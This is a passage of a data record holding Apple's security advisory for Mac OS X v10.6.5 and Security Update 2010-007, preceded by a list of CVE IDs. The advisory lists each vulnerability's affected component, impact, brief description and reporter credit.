"CVE-2010-2189", "CVE-2010-0211", "CVE-2009-2473", "CVE-2010-3783", "CVE-2010-1848", "CVE-2010-2185", "CVE-2010-1837", "CVE-2010-2214", "CVE-2010-2164", "CVE-2009-2474", "CVE-2010-2499", "CVE-2010-2497", "CVE-2009-3793", "CVE-2010-1830", "CVE-2010-1838", "CVE-2010-1829", "CVE-2010-2167", "CVE-2010-3795", "CVE-2010-3647", "CVE-2010-1849", "CVE-2010-0397", "CVE-2010-3643", "CVE-2010-2162", "CVE-2009-4134", "CVE-2009-2624", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-3792", "CVE-2010-2187", "CVE-2010-3649", "CVE-2010-0205", "CVE-2010-3787", "CVE-2010-2178"], "description": "About the security content of Mac OS X v10.6.5 and Security Update 2010-007\r\n\r\n * Last Modified: November 12, 2010\r\n * Article: HT4435\r\n\r\nEmail this article\r\nPrint this page\r\nSummary\r\n\r\nThis document describes the security content of Mac OS X v10.6.5 and Security Update 2010-007, which can be downloaded and installed via Software Update preferences, or from Apple Downloads.\r\n\r\nFor the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. To learn more about Apple Product Security, see the Apple Product Security website.\r\n\r\nFor information about the Apple Product Security PGP Key, see &quot;How to use the Apple Product Security PGP Key.&quot;\r\n\r\nWhere possible, CVE IDs are used to reference the vulnerabilities for further information.\r\n\r\nTo learn about other Security Updates, see &quot;Apple Security Updates.&quot;\r\nProducts Affected\r\n\r\nMac OS X 10.6, Product Security, Security Update 2010-007, Mac OS X v10.6.\r\nMac OS X v10.6.5 and Security Update 2010-007\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1828\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause AFP Server to unexpectedly shutdown\r\n\r\n Description: A null pointer dereference exists in AFP Server&#39;s handling of reconnect authentication packets. A remote attacker may cause AFP Server to unexpectedly shutdown. Mac OS X automatically restarts AFP Server after a shutdown. This issue is addressed through improved validation of reconnect packets. Credit: Apple.\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1829\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: An authenticated user may cause arbitrary code execution\r\n\r\n Description: A directory traversal issue exists in AFP Server, which may allow an authenticated user to create files outside of a share with the permissions of the user. With a system configuration where users are permitted file sharing access only, this may lead to arbitrary code execution. This issue is addressed through improved path validation. Credit: Apple.\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1830\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may determine the existence of an AFP share\r\n\r\n Description: An error handling issue exists in AFP Server. This may allow a remote attacker to determine the existence of an AFP share with a given name. This issue is addressed through improved signaling of error conditions. Credit: Apple.\r\n\r\n *\r\n\r\n Apache mod_perl\r\n\r\n CVE-ID: CVE-2009-0796\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause cross-site scripting against the web server\r\n\r\n Description: A cross-site scripting issue exists in Apache mod_perl&#39;s encoding of HTML output for the /perl-status page. An attacker may leverage this issue to inject arbitrary script code in the context of a web site served by Apache. This issue does not affect the default configuration as mod_perl and its status page are not enabled by default. This issue is addressed by properly escaping HTML output.\r\n\r\n *\r\n\r\n Apache\r\n\r\n CVE-ID: CVE-2010-0408, CVE-2010-0434\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in Apache 2.2.14\r\n\r\n Description: Apache is updated to version 2.2.15 to address several vulnerabilities, the most serious of which may lead to a denial of service. Further information is available via the Apache web site at http://httpd.apache.org/\r\n\r\n *\r\n\r\n AppKit\r\n\r\n CVE-ID: CVE-2010-1842\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Rendering a bidirectional string that requires truncation may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in AppKit. If a string containing bidirectional text is rendered, and it is truncated with an ellipsis, AppKit may apply an inappropriate layout calculation. This could lead to an unexpected application termination or arbitrary code execution. This issue is addressed by avoiding the inappropriate layout calculation. Credit to Jesse Ruderman of Mozilla Corporation for reporting this issue.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1831\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A buffer overflow exists in Apple Type Services&#39; handling of embedded fonts with long names. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. This issue is addressed through improved bounds checking.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1832\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in Apple Type Services&#39; handling of embedded fonts. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. On Mac OS X v10.6 systems this issue is mitigated by the -fstack-protector compiler flag. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1833\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in Apple Type Services&#39; handling of embedded fonts. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit to Marc Schoenefeld of Red Hat, and Christoph Diehl of Mozilla for reporting this issue.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-4010\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution\r\n\r\n Description: A signedness issue exists in Apple Type Services&#39; handling of Compact Font Format &#40;CFF&#41; fonts. Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution. This issue is addressed through improved handling of CFF fonts. This issue does not affect Mac OS X v10.6 systems. Credit to Matias Eissler and Anibal Sacco of Core Security Technologies for reporting this issue.\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2010-1752\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack overflow exists in CFNetwork&#39;s URL handling code. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Laurent OUDOT of TEHTRI-Security, and Neil Fryer of IT Security Geeks for reporting this issue.\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2010-1834\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Visiting a maliciously crafted website may cause cookies to be set for other sites\r\n\r\n Description: An implementation issue exists in CFNetwork&#39;s handling of domain specifications in cookies. CFNetwork allows cookies to be set for a partial IP address. A maliciously crafted website may set a cookie that will be sent to a third-party site, if the third-party site is accessed by IP address. This update addresses the issue by through improved validation of domains specified in cookies.\r\n\r\n *\r\n\r\n CoreGraphics\r\n\r\n CVE-ID: CVE-2010-1836\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in CoreGraphics&#39; handling of PDF files. Opening a maliciously crafted PDF file may lead to an unexpected application termination. On 32-bit systems, it may also lead to arbitrary code execution. This update addresses the issues through improved bounds and error checking. Credit to Andrew Kiss for reporting this issue.\r\n\r\n *\r\n\r\n CoreText\r\n\r\n CVE-ID: CVE-2010-1837\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in CoreText&#39;s handling of font files. Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of font files. Credit: Apple.\r\n\r\n *\r\n\r\n CUPS\r\n\r\n CVE-ID: CVE-2010-2941\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in the handling of Internet Printing Protocol &#40;IPP&#41; requests in CUPS. By sending a maliciously crafted IPP request, a remote attacker may cause an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. This issue may only be triggered remotely on systems with Printer Sharing enabled. Printer Sharing is not enabled by default. Credit to Emmanuel Bouillon of NATO C3 Agency for reporting this issue.\r\n\r\n *\r\n\r\n Directory Services\r\n\r\n CVE-ID: CVE-2010-1838\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local attacker may bypass the password validation and log in to a mobile account\r\n\r\n Description: An error handling issue exists in Directory Service. A local attacker with knowledge of the name of a disabled mobile account, or a mobile account that allows a limited number of login failures, may bypass the password validation and log in to the account. This issue is addressed through improved handling of disabled accounts.\r\n\r\n *\r\n\r\n Directory Services\r\n\r\n CVE-ID: CVE-2010-1840\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: An attacker may be able to cause an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in Directory Services&#39; password validation. An attacker may be able to cause an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team &#40;VDT&#41;, and Rainer Mueller for reporting this issue.\r\n\r\n *\r\n\r\n diskdev_cmds\r\n\r\n CVE-ID: CVE-2010-0105\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local user may be able to prevent the system from starting properly\r\n\r\n Description: An implementation issue exists fsck_hfs&#39; handling of directory trees. A local user may be able to prevent the system from starting properly. This issue is addressed through improved validation of directory trees. Credit to Maksymilian Arciemowicz of SecurityReason for reporting this issue.\r\n\r\n *\r\n\r\n Disk Images\r\n\r\n CVE-ID: CVE-2010-1841\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Opening a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in processing UDIF disk images. Opening a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of UDIF disk images. Credit to Marc Schoenefeld of Red Hat for reporting this issue.\r\n\r\n *\r\n\r\n Flash Player plug-in\r\n\r\n CVE-ID: CVE-2008-4546, CVE-2009-3793, CVE-2010-0209, CVE-2010-1297, CVE-2010-2160, CVE-2010-2161, CVE-2010-2162, CVE-2010-2163, CVE-2010-2164, CVE-2010-2165, CVE-2010-2166, CVE-2010-2167, CVE-2010-2169, CVE-2010-2170, CVE-2010-2171, CVE-2010-2172, CVE-2010-2173, CVE-2010-2174, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2179, CVE-2010-2180, CVE-2010-2181, CVE-2010-2182, CVE-2010-2183, CVE-2010-2184, CVE-2010-2185, CVE-2010-2186, CVE-2010-2187, CVE-2010-2189, CVE-2010-2188, CVE-2010-2213, CVE-2010-2214, CVE-2010-2215, CVE-2010-2216, CVE-2010-2884, CVE-2010-3636, CVE-2010-3638, CVE-2010-3639, CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652, CVE-2010-3654, CVE-2010-3976\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in Adobe Flash Player plug-in\r\n\r\n Description: Multiple issues exist in the Adobe Flash Player plug-in, the most serious of which may lead to arbitrary code execution. The issues are addressed by updating the Flash Player plug-in to version 10.1.102.64. Further information is available via the Adobe web site at http://www.adobe.com/support/security/\r\n\r\n *\r\n\r\n gzip\r\n\r\n CVE-ID: CVE-2010-0001\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An integer overflow exists in gzip&#39;s handling of archives that use LZW compression. Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit to Aki Helin of the Oulu University Secure Programming Group for reporting this issue.\r\n\r\n *\r\n\r\n gzip\r\n\r\n CVE-ID: CVE-2009-2624\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An buffer overflow exists in gzip. Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n Image Capture\r\n\r\n CVE-ID: CVE-2010-1844\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted image may lead to an unexpected system shutdown\r\n\r\n Description: A unbounded memory consumption issue exists in Image Capture. Downloading a maliciously crafted image may lead to an unexpected system shutdown. This issue is addressed through improved input validation. This issue does not affect systems prior to Mac OS X v10.6. Credit to Steven Fisher of Discovery Software Ltd. for reporting this issue.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-1845\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted PSD image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in ImageIO&#39;s handling of PSD images. Viewing a maliciously crafted PSD image may lead to an unexpected application termination or arbitrary code execution. These issues are addressed through improved validation of PSD images. Credit to Dominic Chell of NGSSoftware for reporting one of these issues.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-1811\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in the handling of TIFF Images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-2249, CVE-2010-1205\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in libpng\r\n\r\n Description: libpng is updated to version 1.4.3 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html\r\n\r\n *\r\n\r\n Image RAW\r\n\r\n CVE-ID: CVE-2010-1846\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted RAW image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in Image RAW&#39;s handling of images. Viewing a maliciously crafted RAW image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n Kernel\r\n\r\n CVE-ID: CVE-2010-1847\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local user may cause an unexpected system shutdown\r\n\r\n Description: A memory management issue in the handling of terminal devices may allow a local user to cause an unexpected system shutdown. This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n MySQL\r\n\r\n CVE-ID: CVE-2010-1848, CVE-2010-1849, CVE-2010-1850\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in MySQL 5.0.88\r\n\r\n Description: MySQL is updated to version 5.0.91 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. MySQL is only provided with Mac OS X Server systems. Further information is available via the MySQL web site at http://dev.mysql.com/doc/refman/5.0/en/news-5-0-91.html\r\n\r\n *\r\n\r\n neon\r\n\r\n CVE-ID: CVE-2009-2473, CVE-2009-2474\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in neon 0.28.3\r\n\r\n Description: neon is updated to version 0.28.6 to address several vulnerabilities, the most serious of which may allow a man-in-the-middle attacker to redirect connections and intercept user credentials or other sensitive information. Further information is available via the neon web site at http://www.webdav.org/neon/\r\n\r\n *\r\n\r\n Networking\r\n\r\n CVE-ID: CVE-2010-1843\r\n\r\n Available for: Mac OS X v10.6.2 through v10.6.4, Mac OS X Server v10.6.2 through v10.6.4\r\n\r\n Impact: A remote attacker may cause an unexpected system shutdown\r\n\r\n Description: A null pointer dereference issue exists in the handling of Protocol Independent Multicast &#40;PIM&#41; packets. By sending a maliciously crafted PIM packet, a remote attacker may cause an unexpected system shutdown. This issue is addressed through improved validation of PIM packets. This issue does not affect systems prior to Mac OS X v10.6.2. Credit to an anonymous researcher working with TippingPoint&#39;s Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n OpenLDAP\r\n\r\n CVE-ID: CVE-2010-0211\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause a denial of service or arbitrary code execution\r\n\r\n Description: A memory management issue exists in OpenLDAP. By sending a maliciously crafted query an attacker may cause a denial of service or arbitrary code execution. This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n OpenLDAP\r\n\r\n CVE-ID: CVE-2010-0212\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause a denial of service\r\n\r\n Description: A null pointer dereference exists in OpenLDAP. By sending a maliciously crafted query an attacker may cause a denial of service. This issue is addressed through improved memory management. Credit to Ilkka Mattila and Tuomas Salomaki for reporting this issue.\r\n\r\n *\r\n\r\n OpenSSL\r\n\r\n CVE-ID: CVE-2010-1378\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote user may bypass TLS authentication or spoof a trusted server\r\n\r\n Description: An arithmetic issue exists in OpenSSL&#39;s certificate validation. A remote user may bypass certificate validation steps, and cause OpenSSL to accept any certificate signed by a trusted root as valid. This issue is addressed through improved certificate validation. This issue does not affect systems prior to Mac OS X v10.6. This issue only affects the Mac OS X distribution of OpenSSL. Credit to Ryan Govostes of RPISEC for reporting this issue.\r\n\r\n *\r\n\r\n Password Server\r\n\r\n CVE-ID: CVE-2010-3783\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may be able to log in with an outdated password\r\n\r\n Description: An implementation issue in Password Server&#39;s handling of replication may cause passwords to not be replicated. A remote attacker may be able to log in to a system using an outdated password. This issue is addressed through improved handling of password replication. This issue only affects Mac OS X Server systems. Credit: Apple.\r\n\r\n *\r\n\r\n PHP\r\n\r\n CVE-ID: CVE-2010-0397, CVE-2010-2531\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in PHP 5.3.2\r\n\r\n Description: PHP is updated to version 5.3.3 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/\r\n\r\n *\r\n\r\n PHP\r\n\r\n CVE-ID: CVE-2010-0397, CVE-2010-2531, CVE-2010-2484\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\r\n\r\n Impact: Multiple vulnerabilities in PHP 5.2.12\r\n\r\n Description: PHP is updated to version 5.2.14 to address multiple vulnerabilities, the most serious of which may lead to arbitary code execution. Further information is available via the PHP website at http://www.php.net/\r\n\r\n *\r\n\r\n Printing\r\n\r\n CVE-ID: CVE-2010-3784\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Applications that use the PMPageFormatCreateWithDataRepresentation API may be vulnerable to an unexpected application termination\r\n\r\n Description: A null dereference issue exists in the PMPageFormatCreateWithDataRepresentation API&#39;s handling of XML data. Applications that use this API may be vulnerable to an unexpected application termination. This issue is addressed through improved handling of XML data. Credit to Wujun Li of Microsoft for reporting this issue.\r\n\r\n *\r\n\r\n python\r\n\r\n CVE-ID: CVE-2009-4134, CVE-2010-1449, CVE-2010-1450\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Python applications using the rgbimg and audioop modules may be vulnerable to an unexpected application termination or arbitrary code execution.\r\n\r\n Description: Multiple integer overflows exists in python&#39;s rgbimg and audioop modules. Python applications using the rgbimg and audioop modules may be vulnerable to an unexpected application termination or arbitrary code execution. These issues are addressed through improved bounds checking.\r\n\r\n *\r\n\r\n QuickLook\r\n\r\n CVE-ID: CVE-2010-3785\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in QuickLook&#39;s handling of Microsoft Office files. Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n QuickLook\r\n\r\n CVE-ID: CVE-2010-3786\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted Excel file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickLook&#39;s handling of Excel files. Downloading a maliciously crafted Excel file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit to Tobias Klein, working with VeriSign iDefense Labs for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3787\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in QuickTime&#39;s handling of JP2 images. Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Nils of MWR InfoSecurity for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3788\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in QuickTime&#39;s handling of JP2 images. Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of JP2 images. Credit to Damian Put and Procyun, working with TippingPoint&#39;s Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3789\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted avi file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue is in QuickTime&#39;s handling of avi files. Viewing a maliciously crafted avi file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of avi files. Credit to Damian Put working with TippingPoint&#39;s Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3790\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickTime&#39;s handling of movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of movie files. Credit to Honggang Ren of Fortinet&#39;s FortiGuard Labs for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3791\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in QuickTime&#39;s handling of MPEG encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to an anonymous researcher working with TippingPoint&#39;s Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3792\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A signedness issue exists in QuickTime&#39;s handling of MPEG encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of MPEG encoded movie files. Credit to an anonymous researcher working with TippingPoint&#39;s Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3793\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in the handling of Sorenson encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of Sorenson encoded movie files. Credit to an anonymous researcher working with TippingPoint&#39;s Zero Day Initiative and Carsten Eiram of Secunia Research for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3794\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted FlashPix image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in QuickTime&#39;s handling of FlashPix images. Viewing a maliciously crafted FlashPix image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. Credit to an anonymous researcher working with TippingPoint&#39;s Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3795\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted GIF image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n 